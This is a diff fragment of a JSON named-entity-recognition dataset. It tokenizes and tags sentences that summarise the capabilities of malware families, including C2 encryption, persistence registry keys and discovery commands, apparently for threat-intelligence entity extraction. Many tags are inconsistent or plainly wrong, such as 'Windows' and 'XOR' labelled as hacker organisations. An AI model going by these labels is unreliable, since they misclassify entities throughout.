"`EverNoteTrayUService`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mongall", + "can", + "use", + "`rundll32.exe`", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "Mongall", + "has", + "been", + "packed", + "with", + "Themida." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Mongall", + "can", + "use", + "Base64", + "to", + "encode", + "information", + "sent", + "to", + "its", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mongall", + "has", + "the", + "ability", + "to", + "RC4", + "encrypt", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Mongall", + "can", + "identify", + "drives", + "on", + "compromised", + "hosts", + "and", + "retrieve", + "the", + "hostname", + "via", + "`gethostbyname`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mongall", + "can", + "use", + "HTTP", + "for", + "C2", + "communication." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MoonWind", + "can", + "delete", + "itself", + "or", + "specified", + "files." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MoonWind", + "has", + "a", + "command", + "to", + "return", + "a", + "directory", + "listing", + "for", + "a", + "specified", + "directory." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MoonWind", + "has", + "a", + "keylogger." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "MoonWind", + "saves", + "information", + "from", + "its", + "keylogging", + "routine", + "as", + "a", + ".zip", + "file", + "in", + "the", + "present", + "working", + "directory." + ], + "ner_tags": [ + "B-Way", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MoonWind", + "completes", + "network", + "communication", + "via", + "raw", + "sockets." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MoonWind", + "communicates", + "over", + "ports", + "80,", + "443,", + "53,", + "and", + "8080", + "via", + "raw", + "sockets", + "instead", + "of", + "the", + "protocols", + "usually", + "associated", + "with", + "the", + "ports." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MoonWind", + "obtains", + "the", + "number", + "of", + "removable", + "drives", + "from", + "the", + "victim." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MoonWind", + "has", + "a", + "command", + "to", + "return", + "a", + "list", + "of", + "running", + "processes." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MoonWind", + "encrypts", + "C2", + "traffic", + "using", + "RC4", + "with", + "a", + "static", + "key." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MoonWind", + "can", + "obtain", + "the", + "victim", + "hostname,", + "Windows", + "version,", + "RAM", + "amount,", + "number", + "of", + "drives,", + "and", + "screen", + "resolution." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MoonWind", + "obtains", + "the", + "victim", + "IP", + "address." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MoonWind", + "obtains", + "the", + "victim", + "username." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MoonWind", + "obtains", + "the", + "victim's", + "current", + "time." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MoonWind", + "can", + "execute", + "commands", + "via", + "an", + "interactive", + "command", + "shell.", + "MoonWind", + "uses", + "batch", + "scripts", + "for", + "various", + "purposes,", + "including", + "to", + "restart", + "and", + "uninstall", + "itself." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MoonWind", + "installs", + "itself", + "as", + "a", + "new", + "service", + "with", + "automatic", + "startup", + "to", + "establish", + "persistence.", + "The", + "service", + "checks", + "every", + "60", + "seconds", + "to", + "determine", + "if", + "the", + "malware", + "is", + "running;", + "if", + "not,", + "it", + "will", + "spawn", + "a", + "new", + "instance." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "More_eggs", + "has", + "used", + "a", + "signed", + "binary", + "shellcode", + "loader", + "and", + "a", + "signed", + "Dynamic", + "Link", + "Library", + "(DLL)", + "to", + "create", + "a", + "reverse", + "shell." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "More_eggs", + "will", + "decode", + "malware", + "components", + "that", + "are", + "then", + "dropped", + "to", + "the", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "More_eggs's", + "payload", + "has", + "been", + "encrypted", + "with", + "a", + "key", + "that", + "has", + "the", + "hostname", + "and", + "processor", + "family", + "information", + "appended", + "to", + "the", + "end." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "More_eggs", + "can", + "remove", + "itself", + "from", + "a", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "More_eggs", + "can", + "download", + "and", + "launch", + "additional", + "payloads." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "More_eggs", + "has", + "used", + "HTTP", + "GET", + "requests", + "to", + "check", + "internet", + "connectivity." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "More_eggs", + "has", + "used", + "regsvr32.exe", + "to", + "execute", + "the", + "malicious", + "DLL." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "More_eggs", + "can", + "obtain", + "information", + "on", + "installed", + "anti-malware", + "programs." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "More_eggs", + "has", + "used", + "basE91", + "encoding,", + "along", + "with", + "encryption,", + "for", + "C2", + "communication." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "More_eggs", + "has", + "used", + "an", + "RC4-based", + "encryption", + "method", + "for", + "its", + "C2", + "communications." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "More_eggs", + "has", + "the", + "capability", + "to", + "gather", + "the", + "OS", + "version", + "and", + "computer", + "name." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "More_eggs", + "has", + "the", + "capability", + "to", + "gather", + "the", + "IP", + "address", + "from", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "More_eggs", + "has", + "the", + "capability", + "to", + "gather", + "the", + "username", + "from", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "More_eggs", + "uses", + "HTTPS", + "for", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "More_eggs", + "has", + "used", + "cmd.exe", + "for", + "execution." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "Mori", + "can", + "use", + "DNS", + "tunneling", + "to", + "communicate", + "with", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mori", + "can", + "resolve", + "networking", + "APIs", + "from", + "strings", + "that", + "are", + "ADD-encrypted." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mori", + "can", + "delete", + "its", + "DLL", + "file", + "and", + "related", + "files", + "by", + "Registry", + "value." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mori", + "has", + "obfuscated", + "the", + "FML.dll", + "with", + "200MB", + "of", + "junk", + "data." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mori", + "can", + "write", + "data", + "to", + "`HKLM\\Software\\NFC\\IPA`", + "and", + "`HKLM\\Software\\NFC\\`", + "and", + "delete", + "Registry", + "values." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mori", + "can", + "read", + "data", + "from", + "the", + "Registry", + "including", + "from", + "`HKLM\\Software\\NFC\\IPA`", + "and", + "`HKLM\\Software\\NFC\\`." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mori", + "can", + "use", + "`regsvr32.exe`", + "for", + "DLL", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mori", + "can", + "use", + "Base64", + "encoded", + "JSON", + "libraries", + "used", + "in", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mori", + "can", + "communicate", + "using", + "HTTP", + "over", + "IPv4", + "or", + "IPv6", + "depending", + "on", + "a", + "flag", + "set." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mosquito", + "uses", + "COM", + "hijacking", + "as", + "a", + "method", + "of", + "persistence." + ], + "ner_tags": [ + "B-Org", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mosquito’s", + "installer", + "is", + "obfuscated", + "with", + "a", + "custom", + "crypter", + "to", + "obfuscate", + "the", + "installer." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mosquito", + "deletes", + "files", + "using", + "DeleteFileW", + "API", + "call." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Mosquito", + "stores", + "configuration", + "values", + "under", + "the", + "Registry", + "key", + "<code>HKCU\\Software\\Microsoft\\[dllname]</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mosquito", + "can", + "upload", + "and", + "download", + "files", + "to", + "the", + "victim." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mosquito", + "can", + "modify", + "Registry", + "keys", + "under", + "<code>HKCU\\Software\\Microsoft\\[dllname]</code>", + "to", + "store", + "configuration", + "values.", + "Mosquito", + "also", + "modifies", + "Registry", + "keys", + "under", + "<code>HKCR\\CLSID\\...\\InprocServer32</code>", + "with", + "a", + "path", + "to", + "the", + "launcher." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mosquito", + "leverages", + "the", + "CreateProcess()", + "and", + "LoadLibrary()", + "calls", + "to", + "execute", + "files", + "with", + "the", + ".dll", + "and", + ".exe", + "extensions." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Mosquito", + "can", + "launch", + "PowerShell", + "Scripts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Mosquito", + "runs", + "<code>tasklist</code>", + "to", + "obtain", + "running", + "processes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mosquito", + "establishes", + "persistence", + "under", + "the", + "Registry", + "key", + "<code>HKCU\\Software\\Run", + "auto_update</code>." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Mosquito's", + "launcher", + "uses", + "rundll32.exe", + "in", + "a", + "Registry", + "Key", + "value", + "to", + "start", + "the", + "main", + "backdoor", + "capability." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mosquito's", + "installer", + "searches", + "the", + "Registry", + "and", + "system", + "to", + "see", + "if", + "specific", + "antivirus", + "tools", + "are", + "installed", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mosquito", + "uses", + "a", + "custom", + "encryption", + "algorithm,", + "which", + "consists", + "of", + "XOR", + "and", + "a", + "stream", + "that", + "is", + "similar", + "to", + "the", + "Blum", + "Blum", + "Shub", + "algorithm." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Mosquito", + "uses", + "the", + "<code>ipconfig</code>", + "command." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Mosquito", + "runs", + "<code>whoami</code>", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mosquito", + "executes", + "cmd.exe", + "and", + "uses", + "a", + "pipe", + "to", + "read", + "the", + "results", + "and", + "send", + "back", + "the", + "output", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mosquito's", + "installer", + "uses", + "WMI", + "to", + "search", + "for", + "antivirus", + "display", + "names." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mythic", + "supports", + "SSL", + "encrypted", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Mythic", + "supports", + "scripting", + "of", + "file", + "downloads", + "from", + "agents." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mythic", + "supports", + "DNS-based", + "C2", + "profiles." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Mythic", + "provides", + "various", + "transform", + "functions", + "to", + "encode", + "and/or", + "randomize", + "C2", + "data." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mythic", + "supports", + "custom", + "chunk", + "sizes", + "used", + "to", + "upload/download", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "Mythic", + "supports", + "domain", + "fronting", + "via", + "custom", + "request", + "headers." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mythic", + "can", + "leverage", + "a", + "modified", + "SOCKS5", + "proxy", + "to", + "tunnel", + "egress", + "C2", + "traffic." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mythic", + "can", + "use", + "a", + "list", + "of", + "C2", + "URLs", + "as", + "fallback", + "mechanisms", + "in", + "case", + "one", + "IP", + "or", + "domain", + "gets", + "blocked." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mythic", + "supports", + "SMB-based", + "peer-to-peer", + "C2", + "profiles." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "B-Way", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "Mythic", + "can", + "leverage", + "a", + "peer-to-peer", + "C2", + "profile", + "between", + "agents." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mythic", + "supports", + "WebSocket", + "and", + "TCP-based", + "C2", + "profiles." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "B-Way", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "Mythic", + "can", + "use", + "SOCKS", + "proxies", + "to", + "tunnel", + "traffic", + "through", + "another", + "protocol." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mythic", + "supports", + "HTTP-based", + "C2", + "profiles." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "NBTscan", + "can", + "be", + "used", + "to", + "scan", + "IP", + "networks." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "NBTscan", + "can", + "dump", + "and", + "print", + "whole", + "packet", + "content." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NBTscan", + "can", + "list", + "NetBIOS", + "computer", + "names." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NBTscan", + "can", + "be", + "used", + "to", + "collect", + "MAC", + "addresses." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "NBTscan", + "can", + "list", + "active", + "users", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NDiskMonitor", + "can", + "obtain", + "a", + "list", + "of", + "all", + "files", + "and", + "directories", + "as", + "well", + "as", + "logical", + "drives." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NDiskMonitor", + "can", + "download", + "and", + "execute", + "a", + "file", + "from", + "given", + "URL." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NDiskMonitor", + "uses", + "AES", + "to", + "encrypt", + "certain", + "information", + "sent", + "over", + "its", + "C2", + "channel." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NDiskMonitor", + "obtains", + "the", + "victim", + "computer", + "name", + "and", + "encrypts", + "the", + "information", + "to", + "send", + "over", + "its", + "C2", + "channel." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NDiskMonitor", + "obtains", + "the", + "victim", + "username", + "and", + "encrypts", + "the", + "information", + "to", + "send", + "over", + "its", + "C2", + "channel." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Adversaries", + "can", + "also", + "use", + "NETEAGLE", + "to", + "establish", + "an", + "RDP", + "connection", + "with", + "a", + "controller", + "over", + "TCP/7519." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Idus" + ] + }, + { + "tokens": [ + "NETEAGLE", + "can", + "use", + "HTTP", + "to", + "download", + "resources", + "that", + "contain", + "an", + "IP", + "address", + "and", + "port", + "number", + "pair", + "to", + "connect", + "to", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NETEAGLE", + "is", + "capable", + "of", + "reading", + "files", + "over", + "the", + "C2", + "channel." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NETEAGLE", + "will", + "attempt", + "to", + "detect", + "if", + "the", + "infected", + "host", + "is", + "configured", + "to", + "a", + "proxy.", + "If", + "so,", + "NETEAGLE", + "will", + "send", + "beacons", + "via", + "an", + "HTTP", + "POST", + "request;", + "otherwise", + "it", + "will", + "send", + "beacons", + "via", + "UDP/6000." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "NETEAGLE", + "allows", + "adversaries", + "to", + "enumerate", + "and", + "modify", + "the", + "infected", + "host's", + "file", + "system.", + "It", + "supports", + "searching", + "for", + "directories,", + "creating", + "directories,", + "listing", + "directory", + "contents,", + "reading", + "and", + "writing", + "to", + "files,", + "retrieving", + "file", + "attributes,", + "and", + "retrieving", + "volume", + "information." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "I-Features", + "B-HackOrg", + "I-Features", + "I-Features", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "B-Features", + "I-Features", + "O", + "O", + "B-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "If", + "NETEAGLE", + "does", + "not", + "detect", + "a", + "proxy", + "configured", + "on", + "the", + "infected", + "machine,", + "it", + "will", + "send", + "beacons", + "via", + "UDP/6000.", + "Also,", + "after", + "retrieving", + "a", + "C2", + "IP", + "address", + "and", + "Port", + "Number,", + "NETEAGLE", + "will", + "initiate", + "a", + "TCP", + "connection", + "to", + "this", + "socket.", + "The", + "ensuing", + "connection", + "is", + "a", + "plaintext", + "C2", + "channel", + "in", + "which", + "commands", + "are", + "specified", + "by", + "DWORDs." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NETEAGLE", + "can", + "send", + "process", + "listings", + "over", + "the", + "C2", + "channel." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "\"SCOUT\"", + "variant", + "of", + "NETEAGLE", + "achieves", + "persistence", + "by", + "adding", + "itself", + "to", + "the", + "<code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run</code>", + "Registry", + "key." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "NETEAGLE", + "will", + "decrypt", + "resources", + "it", + "downloads", + "with", + "HTTP", + "requests", + "by", + "using", + "RC4", + "with", + "the", + "key", + "\"ScoutEagle.\"" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "NETEAGLE", + "will", + "attempt", + "to", + "detect", + "if", + "the", + "infected", + "host", + "is", + "configured", + "to", + "a", + "proxy.", + "If", + "so,", + "NETEAGLE", + "will", + "send", + "beacons", + "via", + "an", + "HTTP", + "POST", + "request.", + "NETEAGLE", + "will", + "also", + "use", + "HTTP", + "to", + "download", + "resources", + "that", + "contain", + "an", + "IP", + "address", + "and", + "Port", + "Number", + "pair", + "to", + "connect", + "to", + "for", + "further", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NETEAGLE", + "allows", + "adversaries", + "to", + "execute", + "shell", + "commands", + "on", + "the", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NETWIRE", + "can", + "discover", + "and", + "close", + "windows", + "on", + "controlled", + "systems." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { 